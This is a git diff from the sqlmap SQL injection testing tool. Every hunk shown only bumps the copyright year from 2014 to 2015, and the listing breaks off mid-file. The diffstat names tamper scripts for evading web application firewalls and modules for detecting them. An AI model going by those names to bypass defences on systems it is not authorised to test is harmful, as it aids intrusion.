 tamper/apostrophenullencode.py          | 2 +-
 tamper/appendnullbyte.py                | 2 +-
 tamper/base64encode.py                  | 2 +-
 tamper/between.py                       | 2 +-
 tamper/bluecoat.py                      | 2 +-
 tamper/chardoubleencode.py              | 2 +-
 tamper/charencode.py                    | 2 +-
 tamper/charunicodeencode.py             | 2 +-
 tamper/concat2concatws.py               | 2 +-
 tamper/equaltolike.py                   | 2 +-
 tamper/greatest.py                      | 2 +-
 tamper/halfversionedmorekeywords.py     | 2 +-
 tamper/ifnull2ifisnull.py               | 2 +-
 tamper/lowercase.py                     | 2 +-
 tamper/modsecurityversioned.py          | 2 +-
 tamper/modsecurityzeroversioned.py      | 2 +-
 tamper/multiplespaces.py                | 2 +-
 tamper/nonrecursivereplacement.py       | 2 +-
 tamper/overlongutf8.py                  | 2 +-
 tamper/percentage.py                    | 2 +-
 tamper/randomcase.py                    | 2 +-
 tamper/randomcomments.py                | 2 +-
 tamper/securesphere.py                  | 2 +-
 tamper/sp_password.py                   | 2 +-
 tamper/space2comment.py                 | 2 +-
 tamper/space2dash.py                    | 2 +-
 tamper/space2hash.py                    | 2 +-
 tamper/space2morehash.py                | 2 +-
 tamper/space2mssqlblank.py              | 2 +-
 tamper/space2mssqlhash.py               | 2 +-
 tamper/space2mysqlblank.py              | 2 +-
 tamper/space2mysqldash.py               | 2 +-
 tamper/space2plus.py                    | 2 +-
 tamper/space2randomblank.py             | 2 +-
 tamper/unionalltounion.py               | 2 +-
 tamper/unmagicquotes.py                 | 2 +-
 tamper/varnish.py                       | 2 +-
 tamper/versionedkeywords.py             | 2 +-
 tamper/versionedmorekeywords.py         | 2 +-
 tamper/xforwardedfor.py                 | 2 +-
 thirdparty/bottle/__init__.py           | 2 +-
 txt/common-columns.txt                  | 2 +-
 txt/common-outputs.txt                  | 2 +-
 txt/common-tables.txt                   | 2 +-
 txt/keywords.txt                        | 2 +-
 txt/user-agents.txt                     | 2 +-
 waf/360.py                              | 2 +-
 waf/__init__.py                         | 2 +-
 waf/airlock.py                          | 2 +-
 waf/anquanbao.py                        | 2 +-
 waf/baidu.py                            | 2 +-
 waf/barracuda.py                        | 2 +-
 waf/bigip.py                            | 2 +-
 waf/binarysec.py                        | 2 +-
 waf/blockdos.py                         | 2 +-
 waf/ciscoacexml.py                      | 2 +-
 waf/cloudflare.py                       | 2 +-
 waf/datapower.py                        | 2 +-
 waf/denyall.py                          | 2 +-
 waf/dotdefender.py                      | 2 +-
 waf/edgecast.py                         | 2 +-
 waf/expressionengine.py                 | 2 +-
 waf/fortiweb.py                         | 2 +-
 waf/hyperguard.py                       | 2 +-
 waf/incapsula.py                        | 2 +-
 waf/isaserver.py                        | 2 +-
 waf/jiasule.py                          | 2 +-
 waf/knownsec.py                         | 2 +-
 waf/kona.py                             | 2 +-
 waf/modsecurity.py                      | 2 +-
 waf/netcontinuum.py                     | 2 +-
 waf/netscaler.py                        | 2 +-
 waf/paloalto.py                         | 2 +-
 waf/profense.py                         | 2 +-
 waf/proventia.py                        | 2 +-
 waf/radware.py                          | 2 +-
 waf/requestvalidationmode.py            | 2 +-
 waf/safedog.py                          | 2 +-
 waf/secureiis.py                        | 2 +-
 waf/senginx.py                          | 2 +-
 waf/sucuri.py                           | 2 +-
 waf/teros.py                            | 2 +-
 waf/trafficshield.py                    | 2 +-
 waf/urlscan.py                          | 2 +-
 waf/uspses.py                           | 2 +-
 waf/varnish.py                          | 2 +-
 waf/webappsecure.py                     | 2 +-
 waf/webknight.py                        | 2 +-
 295 files changed, 295 insertions(+), 295 deletions(-)

diff --git a/doc/COPYING b/doc/COPYING
index eb876f56c..880d8774b 100644
--- a/doc/COPYING
+++ b/doc/COPYING
@@ -1,7 +1,7 @@
 COPYING -- Describes the terms under which sqlmap is distributed. A copy
 of the GNU General Public License (GPL) is appended to this file.
 
-sqlmap is (C) 2006-2014 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+sqlmap is (C) 2006-2015 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
 
 This program is free software; you may redistribute and/or modify it under
 the terms of the GNU General Public License as published by the Free
diff --git a/extra/__init__.py b/extra/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/extra/__init__.py
+++ b/extra/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/beep/__init__.py b/extra/beep/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/extra/beep/__init__.py
+++ b/extra/beep/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/beep/beep.py b/extra/beep/beep.py
index 49c4deafa..b46036b2a 100644
--- a/extra/beep/beep.py
+++ b/extra/beep/beep.py
@@ -3,7 +3,7 @@
 """
 beep.py - Make a beep sound
 
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/cloak/__init__.py b/extra/cloak/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/extra/cloak/__init__.py
+++ b/extra/cloak/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py
index cddc5555a..a94f6756f 100755
--- a/extra/cloak/cloak.py
+++ b/extra/cloak/cloak.py
@@ -3,7 +3,7 @@
 """
 cloak.py - Simple file encryption/compression utility
 
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/dbgtool/__init__.py b/extra/dbgtool/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/extra/dbgtool/__init__.py
+++ b/extra/dbgtool/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/dbgtool/dbgtool.py b/extra/dbgtool/dbgtool.py
index a59797243..4d3dc8c5e 100644
--- a/extra/dbgtool/dbgtool.py
+++ b/extra/dbgtool/dbgtool.py
@@ -3,7 +3,7 @@
 """
 dbgtool.py - Portable executable to ASCII debug script converter
 
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/mssqlsig/update.py b/extra/mssqlsig/update.py
index 902c8ef1e..67d7ee6aa 100644
--- a/extra/mssqlsig/update.py
+++ b/extra/mssqlsig/update.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/safe2bin/__init__.py b/extra/safe2bin/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/extra/safe2bin/__init__.py
+++ b/extra/safe2bin/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/safe2bin/safe2bin.py b/extra/safe2bin/safe2bin.py
index bad03a8d2..c91620ec6 100644
--- a/extra/safe2bin/safe2bin.py
+++ b/extra/safe2bin/safe2bin.py
@@ -3,7 +3,7 @@
 """
 safe2bin.py - Simple safe(hex) to binary format converter
 
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/shutils/duplicates.py b/extra/shutils/duplicates.py
index 641fb8b76..eac95ccf8 100644
--- a/extra/shutils/duplicates.py
+++ b/extra/shutils/duplicates.py
@@ -1,6 +1,6 @@
 #!/usr/bin/env python
 
-# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 # Removes duplicate entries in wordlist like files
diff --git a/extra/shutils/regressiontest.py b/extra/shutils/regressiontest.py
index a080a2af7..415714430 100755
--- a/extra/shutils/regressiontest.py
+++ b/extra/shutils/regressiontest.py
@@ -1,6 +1,6 @@
 #!/usr/bin/env python
 
-# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 import codecs
diff --git a/extra/sqlharvest/__init__.py b/extra/sqlharvest/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/extra/sqlharvest/__init__.py
+++ b/extra/sqlharvest/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/sqlharvest/sqlharvest.py b/extra/sqlharvest/sqlharvest.py
index 84de8d7f0..75dae5093 100644
--- a/extra/sqlharvest/sqlharvest.py
+++ b/extra/sqlharvest/sqlharvest.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/__init__.py b/lib/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/__init__.py
+++ b/lib/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/controller/__init__.py b/lib/controller/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/controller/__init__.py
+++ b/lib/controller/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/controller/action.py b/lib/controller/action.py
index 64150abed..b134cef15 100644
--- a/lib/controller/action.py
+++ b/lib/controller/action.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index a2984e00d..9a5f147c3 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 3951ba168..1f47d0890 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/controller/handler.py b/lib/controller/handler.py
index 13b570442..b360c0b46 100644
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/__init__.py b/lib/core/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/core/__init__.py
+++ b/lib/core/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/agent.py b/lib/core/agent.py
index 83d720678..78d81c6e0 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index 22db383df..e1acee90f 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/common.py b/lib/core/common.py
index 0f96d92e3..b1e48e919 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/convert.py b/lib/core/convert.py
index 2cd58bb64..6b54d0c33 100644
--- a/lib/core/convert.py
+++ b/lib/core/convert.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/data.py b/lib/core/data.py
index 6254ee46d..bb45072ff 100644
--- a/lib/core/data.py
+++ b/lib/core/data.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/datatype.py b/lib/core/datatype.py
index 6460fe443..8fb16268b 100644
--- a/lib/core/datatype.py
+++ b/lib/core/datatype.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/decorators.py b/lib/core/decorators.py
index 8c46d38cc..8fa7b03b1 100644
--- a/lib/core/decorators.py
+++ b/lib/core/decorators.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/defaults.py b/lib/core/defaults.py
index d183e5377..6adecbe25 100644
--- a/lib/core/defaults.py
+++ b/lib/core/defaults.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/dicts.py b/lib/core/dicts.py
index 0a3d7dabe..40d2892c6 100644
--- a/lib/core/dicts.py
+++ b/lib/core/dicts.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/dump.py b/lib/core/dump.py
index c88445213..8da0c2c62 100644
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/enums.py b/lib/core/enums.py
index 848678487..816111514 100644
--- a/lib/core/enums.py
+++ b/lib/core/enums.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/exception.py b/lib/core/exception.py
index eed80e1eb..faeff7c41 100644
--- a/lib/core/exception.py
+++ b/lib/core/exception.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/log.py b/lib/core/log.py
index 99b5626a4..503cdf4e1 100644
--- a/lib/core/log.py
+++ b/lib/core/log.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/option.py b/lib/core/option.py
index fd3a8c21b..bc5f68768 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index 3c09adeda..5844e87e7 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/profiling.py b/lib/core/profiling.py
index e316c31ee..c212a0bb5 100644
--- a/lib/core/profiling.py
+++ b/lib/core/profiling.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py
index 1ad455b49..2dc0467c4 100644
--- a/lib/core/readlineng.py
+++ b/lib/core/readlineng.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/replication.py b/lib/core/replication.py
index 72787eb16..b65f818de 100644
--- a/lib/core/replication.py
+++ b/lib/core/replication.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/revision.py b/lib/core/revision.py
index 5caf32ef8..5319f1aa3 100644
--- a/lib/core/revision.py
+++ b/lib/core/revision.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/session.py b/lib/core/session.py
index ccb529987..68b4e13a4 100644
--- a/lib/core/session.py
+++ b/lib/core/session.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 59522a204..b15df978a 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/shell.py b/lib/core/shell.py
index aeeea9e1f..d4ca035e0 100644
--- a/lib/core/shell.py
+++ b/lib/core/shell.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/subprocessng.py b/lib/core/subprocessng.py
index 6b34e4fba..eee73afdd 100644
--- a/lib/core/subprocessng.py
+++ b/lib/core/subprocessng.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/target.py b/lib/core/target.py
index 6a37b7d54..464cc3f93 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/testing.py b/lib/core/testing.py
index bc72de58c..8339cbc32 100644
--- a/lib/core/testing.py
+++ b/lib/core/testing.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/threads.py b/lib/core/threads.py
index 0d4e36e05..8647ecfd0 100644
--- a/lib/core/threads.py
+++ b/lib/core/threads.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/unescaper.py b/lib/core/unescaper.py
index 6377d54dd..205b77a94 100644
--- a/lib/core/unescaper.py
+++ b/lib/core/unescaper.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/update.py b/lib/core/update.py
index acff694c6..f2a8de322 100644
--- a/lib/core/update.py
+++ b/lib/core/update.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/wordlist.py b/lib/core/wordlist.py
index 704090754..bc4e486a1 100644
--- a/lib/core/wordlist.py
+++ b/lib/core/wordlist.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/parse/__init__.py b/lib/parse/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/parse/__init__.py
+++ b/lib/parse/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/parse/banner.py b/lib/parse/banner.py
index 74ee36840..c83c42aa0 100644
--- a/lib/parse/banner.py
+++ b/lib/parse/banner.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index ef3112aec..d2171ea39 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py
index 24e6aadb5..653faefbc 100644
--- a/lib/parse/configfile.py
+++ b/lib/parse/configfile.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/parse/handler.py b/lib/parse/handler.py
index 36a47671d..04950ecbd 100644
--- a/lib/parse/handler.py
+++ b/lib/parse/handler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/parse/headers.py b/lib/parse/headers.py
index 1f6b740e0..4ca97779c 100644
--- a/lib/parse/headers.py
+++ b/lib/parse/headers.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/parse/html.py b/lib/parse/html.py
index 51a7708c2..3c40920e6 100644
--- a/lib/parse/html.py
+++ b/lib/parse/html.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py
index 7a7e617b8..f41db9dfd 100644
--- a/lib/parse/payloads.py
+++ b/lib/parse/payloads.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/parse/sitemap.py b/lib/parse/sitemap.py
index 799f62a92..009a63450 100644
--- a/lib/parse/sitemap.py
+++ b/lib/parse/sitemap.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/__init__.py b/lib/request/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/request/__init__.py
+++ b/lib/request/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/basic.py b/lib/request/basic.py
index b32a8c94c..fa6dd8cee 100755
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/basicauthhandler.py b/lib/request/basicauthhandler.py
